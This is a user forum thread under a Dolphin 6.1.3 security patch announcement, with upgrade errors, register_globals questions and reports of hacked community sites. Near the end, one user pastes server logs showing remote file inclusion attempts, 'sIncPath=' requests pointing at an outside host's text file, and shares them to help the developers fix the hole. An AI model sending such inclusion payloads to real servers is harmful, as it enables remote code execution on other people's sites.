IMPORTANT. Dolphin 6.1.3 Security Patch Release

Awesome work Victor, thanks to all who created this wonderful software. I am installing the new dolphin as we speak. Hope this stops most of those mean hackers..urghhh

Thanks Victor! But could you support a Dif of the files? Cause my site is heavily moded, so i have to know what is changed to the original once.
Or maybe i dont have to use this, cause my registerd_globals are setted to off, this means i dont need it, right?

Cheers,
Jerry

Works like a charm, glad to see some of the bugs fixed too thank you team boonex i know you worked hard to get this done as quickly as possible. and it was a huge job.

just to clarify, although this patch makes it safer for dolphin site on hosts with register globals on. boonex still recommend, (as it is much safer all round) to choose a host with register globals off.

Thanks Victor,

That was quick easy and painless... now let's see what the hackers do to counter.

hello VictorT,

many thanks from germany!

I thank you also Victor for your efforts on behalf of us all

Big thanks for the patch....

On another but related subject... I checked my 'cache' folder and found a sub-folder named "PPP" which contains two "acct.php" and "index.html" files.

Are these normal? I have tried to download a copy and delete the files from my server but i can't do it.

Also, I have deleted the files under the 'cache' folder" just for my own security measure. is this OK.

Please advise.

I get the following error when I try to compile the ORCA language file. (I changed EVERY file and folder in ORCA to 777 and still get this message)

Warning: fopen(/MYSITE/orca/conf/params.conf): failed to open stream: Permission denied in /MYSITE/orca/inc/util.inc.php on line 263

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 36

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 37

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 38

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 39

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/classes/en/BxXslTransform.php on line 61

I got the same errors as first writer... and deleting the the file you advized has not effect...

Thanks for the patch. Can I also suggest you stop promoting Host For Web since they have register globals on by default.

Can you tell me where I can fin d the security patch please. I cannot find the link anywhere.

Its in the top blog post. They are calling it an upgrade from 6.1.2 to 6.1.3. It seems if you run an earlier version you arent covered. For security reasons they recommend you have the latest version.

Oke now get strange things... I can't login to my own admin center after the patch, not only the same errors like Hakknslash, but also to admin login. I fill in my data and it say's "wating" and returns to index.php login.

I use firefox 3... Dolphin updated from 6.1.2 to 6.1.3 before the patch no problems...

Thank you!

Thanks for the patch.

I am getting this:

Warning: require_once(BX_DIRECTORY_PATH_INCprofiles.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/connect/public_html/admin/index.php on line 26

Fatal error: require_once() [function.require]: Failed opening required 'BX_DIRECTORY_PATH_INCprofiles.inc.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/connect/public_html/admin/index.php on line 26

And this under Orca

Warning: require_once(BX_DIRECTORY_PATH_ROOTgroups/orca/layout/uni/params.php) [function.require-once]: failed to open stream: No such file or directory in /home/connect/public_html/groups/orca/xml/config.php on line 89

Fatal error: require_once() [function.require]: Failed opening required 'BX_DIRECTORY_PATH_ROOTgroups/orca/layout/uni/params.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/connect/public_html/groups/orca/xml/config.php on line 89

Help!

Stuart

and I cannot access Admin

Help!

Stuart

Hello, personnel boonex, I update my dolphin to 6.1.3, even taking register_globals, off? I have doubts!

Thanks for the patch Victor.

I built a brand new Dolphin upgraded all the way from 6.1.1 to 6.1.3 had no problems. Forgot to update the header.inc.php and guess what error I got :) Updated language files no problem. I am currently running RG_off.

When I did the upgrade on GGsite all went fine but I am still being punched :) IT DID tweek the attack thou...I'll send you the Log File. Still No Infections!

do we need to apply this patch even if we download the latest version today and start a fresh website ?

Hello AndreyP

files are:
define('BX_DIRECTORY_PATH_INC', $dir['inc']);
define('BX_DIRECTORY_PATH_ROOT', $dir['root']);
define('BX_DIRECTORY_PATH_BASE', $dir['base']);
define('BX_DIRECTORY_PATH_CACHE', $dir['cache']);
define('BX_DIRECTORY_PATH_CLASSES', $dir['classes']);
define('BX_DIRECTORY_PATH_PLUGINS', $dir['plugins']);

Stuart

Ok, problem solved!!

Stuart

I forgot to upload the modified inc/headerinc.php file!!

Thanks for the patch and update guys!! Just a thought though not everyone reads the blogs or has email notifications. If a security update is involved you might think about or consider other ways to push it to people. I've emailed a few people and they were not even aware of counting this patch the last 2 or further.

I am glad I do follow these blogs. Thanks for the updates!!

The upgrades have busted my Orca css again so all my line breaks have gone in all my Orca Forum posts! Man this is FRUSTRATING! Sometimes feel like I'm banging my head against a wall.

thanks Victor

it's great ... I upgraded my site successfully

my site work fine

best regards
Rawaf
http://www.a7lakalam.com

If my register globals are OFF, do i have to appy for this patch???

Thanks Victor and the Boonex team,

Am I the only one or can we all sense the entire community coming together because of this problem? I am really proud to be a part of this movement.

Kudos to DosDawg who has been working tirelessly in the forums to help as many as he can.

Juker

Hello Victor, I think the Patsch toll, although we do not need this Patsch, but I think that many users use the Web space is difficult and have their server right to use, very helpful.

I'm computer illiterate so Joombyte is doing the upgrade for me! Yipee!

Does this fix the problem with the v6.12 RSS Feeds not working?
as far as I can tell it was something altered in the database.

I upgraded to 6.12 and my RSS feeds stopped working, does the 6.13 patch look at this problem?

Hackers can leave files and folders behind that are almost impossible to delete. If you suspect these files, work with technical support of the ISP to get rid of these.

Thanks

I noticed that the Patch.zip file does not include a modified .htaccess file, nor is there a php.ini file to set register_globals off at the directory level. My provider says I must set register_globals off locally using a php.ini file. In terms of syntax, some have said using register_globals = 0 and others say register_globals = off. Also, others have suggested modifications to the .htaccess file. Could someone post a modified .htaccess file that works form them, and if anyone needs to use the php.ini method for setting register_globals off, could they post a version of this file? Thanks very much.

I'm pretty new here and I've added few mods to my site. I've not applied any patches by myself so far. Would these patches overwrite those mods which I've installed?

Dolphin Dates on Blogs, RSS feeds & Events: I've applied the patch to 6.1.3 and now all of the dates on my postings are wrong. For example, Events show a date of "_day_of_9" when I check the date is correctly set to 1 Sept 2008 and the same for Blog postings. RSS feeds show a date for the posts of "NaN".

Any ideas on how to fix this?

joe

Ага и отсутствующие ?> как минимум в двух файлах пофиксили . Да и ещё много чего . Вот только как бы узнать что именно было добавлено или удалено из движка . Где можно увидеть историю изменений .

P.S. говорить про безопасность в контекте этого движка не уместно моё ИМХО

I make this update, but i have one probleme whit Ray suite wich can't load , when i clicked on ray application i have a error message : " LOADING ERROR"
Before this update everything works good.

If anyone have an idea ?

Dear VictorT

i am happy you realesed this one also we are hacked also, i know we are a small community of artists (just70 activ) but we invite only artist who we think to come over the huge wave of artists around the world and we want to share and to show art . i was soo tired to reintegrate all the moduls and maybe in the future you will really check up the stuff of expertzzz home to be shure the customers of your script run not in a knife of again and again to "reinstall" all there stuff who they payed with money . your script is great and i love it total but to rebuild our site i will wait because i want to be shure we did not run again in this "black hole" of "reinstall" .
my thoughts to you and i know many is happend here in your little world called boonex but if you are a human with humans you will know what it means to say "to stay and keep cool"
kind regards

Gregor Scharff
founder and CEO of Digital Renaissances Network
& a artist with the pur power of art

Dear VictorT

i am happy you realesed this one also we are hacked also, i know we are a small community of artists (just70 activ) but we invite only artist who we think to come over the huge wave of artists around the world and we want to share and to show art . i was soo tired to reintegrate all the moduls and maybe in the future you will really check up the stuff of expertzzz home to be shure the customers of your script run not in a knife of again and again to "reinstall" all there stuff who they payed with money . your script is great and i love it total but to rebuild our site i will wait because i want to be shure we did not run again in this "black hole" of "reinstall" .
my thoughts to you and i know many is happend here in your little world called boonex but if you are a human with humans you will know what it means to say "to stay and keep cool"
kind regards

Gregor Scharff
founder and CEO of Digital Renaissances Network
& a artist with the pur power of art

PS: maybe you found a way like moduls to create who can installed and uninstalled from the admin interface it will be so helpful for the intigrate of new options or a package for the new stuff who can be removed easyly if it makes problems . :) take care and all the best to you and your team who was always helpful for shure !!!!!!!!!!!!!

a note again : please check the RMS(not ray) system because i think we got from there a attack who works well in our system (vserver)

I am having issues with the chat in the new dolphin release. Dolphin-v.6.1.3-Free All widgets work except the chat,it just continues to load but nothing happens. I have installed 2 times and get same thing. I also tried using the chat from 6.1.2 and a separate ray install, and that did not work. Is this just my issue or is it a dolphin issue? Should i wait for dolphin 6.2

mayby you take a look at the guestbook.php someone trys nowalways to enter it :

Fri Jul 25 06:13:15 2008] [error] [client 195.58.3.163] File does not exist: /srv/www/vhosts/digital-renaicances.org/httpdocs/community, referer: http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add
[Fri Jul 25 06:13:16 2008] [error] [client 89.149.242.88] File does not exist: /srv/www/vhosts/digital-renaicances.org/httpdocs/community, referer: http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add

with diffrent IPs

kind regards

gregor

and this is the access log from our server but we installed now all new ( just the os system not more) :

195.58.3.163 - - [25/Jul/2008:06:13:15 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.242.88 - - [25/Jul/2008:06:13:16 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
90.157.115.140 - - [25/Jul/2008:06:19:18 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.0" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.182.159.1 - - [25/Jul/2008:06:19:34 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.206.238.35 - - [25/Jul/2008:06:20:51 +0200] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt%0D?? HTTP/1.1" 200 7137 "-" "libwww-perl/5.803"
216.206.238.35 - - [25/Jul/2008:06:21:25 +0200] "GET /community/?sIncPath=http://www.doxgroup.com/egroupware/did.txt%0D?? HTTP/1.1" 404 1086 "-" "libwww-perl/5.803"
66.249.66.66 - - [25/Jul/2008:06:24:08 +0200] "GET /community/ray/ HTTP/1.1" 404 1086 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

he/she trys to enter hahahah

hope it helps for fixing

On trying to compile Orca lanuage I am getting error "Language files compilation have been failed. Please check folders permissions."

All level 1 folders under /orca/ are set to 777.

Same problem with /groups/orca/

Can someone please guide on solving this issue.

I just uploaded the patch and now I go the the index page I get this error:

Warning: Division by zero in /mysite.com/templates/base/scripts/BxBaseIndex.php on line 445
Error Database query error

This is line 445 ---> $pages = ceil( $num / $max_num );

Any ideas? Thanks for all you guys do!!

My Site Is Being Hacked!

BEWARE - The patches do not work AND THE PROBLEM is not fixed!

I have 70 active members and on (8/3/08) Sunday night 10 members disappeared, on Monday night another 10 members disappeared, on Tuesday I began rebuilding and added 12 new members for a total of 62 and on Tuesday night 25 members disappeared. On Wednesday I removed all of the members except nine from my website and this morning (Thursday) one of the nine is missing.

I installed patch 6.1.3 with no error messages but when I installed the patch 6.1.4 I tried to recompile the language files but for /groups/orca or for /orca I get a "Failure To Recompile" error message and I can no longer recompile languages.

Can anyone help with the virus attack? The Dolphin patches are ineffective.

Thanks

Attention Boonex Community - Hacker Alert!

No Password on your site is safe. My member passwords are being bypassed and all membership information is being systematically deleted. I have temporarily changed the status of my remaining existing members to unconfirmed and the hacker cannot see them. Change your memberships to unconfirmed until this hacker attack is eliminated.

I want to give the Boonex team the benefit of the doubt. I think they are working hard to beat down these hackers and my problem may be a new problem not covered by the patches.

Juker

Has this problem been solved yet?

Juker's problem sounds more like database pruning and not a virus.

Go to the Admin panel>Settings>Database pruning>Clean old profiles by last log in ( days ) and set it to something like 3000 otherwise it will delete your older profiles automatically.

Hope that helps.


Prof.